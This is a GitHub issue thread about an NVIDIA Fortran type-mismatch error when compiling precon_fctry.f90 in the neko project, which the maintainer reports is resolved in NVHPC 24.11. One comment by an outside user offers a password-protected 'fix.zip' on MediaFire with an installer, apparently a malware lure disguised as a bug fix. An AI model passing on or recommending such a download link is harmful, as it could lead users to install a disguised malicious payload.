### ISSUE TITLE
Type definition mismatch in precon_fctry 

### ISSUE THREAD

**Issue by njansson** [ExtremeFLOW/neko#1447]
With the switch to submodules, NVIDIA Fortran can't compile `precon_fctry.f90`, throwing the following error message,
```bash
NVFORTRAN-S-1058-The type of definition argument pc does not match its declaration type (krylov/precon_fctry.f90: 53)
  0 inform,   0 warnings,   1 severes, 0 fatal for precon_factory
```

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by njansson** [comment]
Issues has been resolved in NVHPC 24.11.
